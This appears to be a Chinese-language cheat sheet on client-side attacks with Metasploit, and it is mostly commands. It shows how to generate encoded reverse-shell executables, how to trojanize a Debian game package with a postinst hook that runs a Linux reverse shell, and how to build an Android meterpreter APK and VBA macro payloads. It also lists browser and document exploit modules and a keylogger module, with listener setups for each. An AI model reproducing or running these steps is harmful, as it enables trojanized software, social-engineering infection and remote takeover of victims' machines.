- 在无法突破网络边界的情况下转而攻击客户端,通过社会工程学攻击,进而渗透线上业务网络
- 含有漏洞利用代码的 web 站点
- 含有漏洞利用代码的 doc、pdf等文档
- 诱骗被害者执行 payload
windows客户端
#生成payloadmsfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 9 -f exe -o 1.exe#启动apacheservice apache2 startcp 1.exe /var/www/html/#用msf侦听msfconsoleuse exploit/multi/handlerset payload/windows/shell/reverse_tcpset LHOST 192.168.1.121set LPORT 4444exploit
Linux客户端
原文:https://fishpond.blog.csdn.net/article/details/105805423#搞个deb包apt --download-only install freesweepcd /var/cache/apt/archives #deb包在这个文件夹dpkg -x freesweep_0.90-3+b1_amd64.deb free #解包cd free/mkdir DEBIANcd DEBIAN/#创建控制文件vi controlPackage: freesweepVersion: 0.90-3Section: Games and AmusementPriority: optionalArchitecture:amd64Maintainer: Ubuntu MOTU Developers (ubuntu-motu@ lists.ubuntu.com)Description: a text-based minesweeperFreesweep isan implementation of the popular minesweeper game,whereone tries to find all the mines without igniting any, based on hints givenby the computer.Unlike most implementations of this game,Freesweepworksinanyvisualtextdispl in Linuxconsole,inanxterm,and inmost text-based terminals currently in use.#创建脚本vi postinst#!/bin/shsudo chmod 2755 /usr/games/freesweep_scores && /usr/games/freesweep_scores & /usr/games/freesweep &chmod 755 postinst#生成payloadmsfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -b "\x00" -f elf -o /root/free/usr/games/freesweep_scores#打包生成deb包dpkg-deb --build /root/freeservice apache2 startcp free.deb /var/www/html/#用msf侦听msfconsolemsf > use exploit/multi/handlerset payload/linux/x86/shell/reverse_tcpset LHOST 192.168.1.121set LPORT 4444exploit
利用 Acrobat Reader 漏洞执行 payload
#构造pdf文件exploit/windows/fileformat/adobe_utilprintf#构造恶意网站exploit/windows/browser/adobe_utilprintf– Meterpreter▪ use priv▪ run post/windows/capture/keylog_recorder
利用 flash 插件和IE浏览器漏洞执行 paylaod
```powershell use exploit/multi/browser/adobe_flash_hacking_team_uaf use exploit/multi/browser/adobe_flash_opaque_background_uaf use auxiliary/server/browser_autopwn2(打包了msf payload)IE浏览器漏洞
use exploit/windows/browser/ms14_064_ole_code_execution
<a name="MoEtt"></a>### 利用 JRE 漏洞执行 payload```powershelluse exploit/multi/browser/java_jre17_driver_manageruse exploit/multi/browser/java_jre17_jmxbeanuse exploit/multi/browser/java_jre17_reflection_type
生成 android 后门程序
msf > use payload/android/meterpreter/reverse_tcp
msf payload(reverse_tcp) > set LHOST 192.168.1.121
msf payload(reverse_tcp) > generate -f a.apk -p android -t raw #要生成个apk
# 开启监听
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload/android/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.121
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > exploit
宏感染
利用宏感染 word、except 文档
绕过某些基于文件类型检查的安全机制
可以绕过win10防火墙的
生成 vbscript 脚本
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1.121 LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
#生成两部分内容:VBA代码和16进制payload
#用msf侦听
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload/windows/shell/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.1.121
msf exploit(multi/handler) > set LPORT 4444
msf exploit(multi/handler) > exploit
